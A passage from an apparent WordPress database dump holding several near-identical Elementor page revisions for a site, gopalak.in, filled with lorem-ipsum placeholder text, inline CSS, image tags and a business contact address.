*/\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:08:19','2022-09-30 06:38:19','',1373,'https://gopalak.in/?p=1494',0,'revision','',0),(1495,1,'2022-09-30 12:08:19','2022-09-30 06:38:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:08:19','2022-09-30 06:38:19','',1373,'https://gopalak.in/?p=1495',0,'revision','',0),(1496,1,'2022-09-30 12:08:19','2022-09-30 06:38:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:08:19','2022-09-30 06:38:19','',1373,'https://gopalak.in/?p=1496',0,'revision','',0),(1497,1,'2022-09-30 12:18:52','2022-09-30 06:48:52','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title 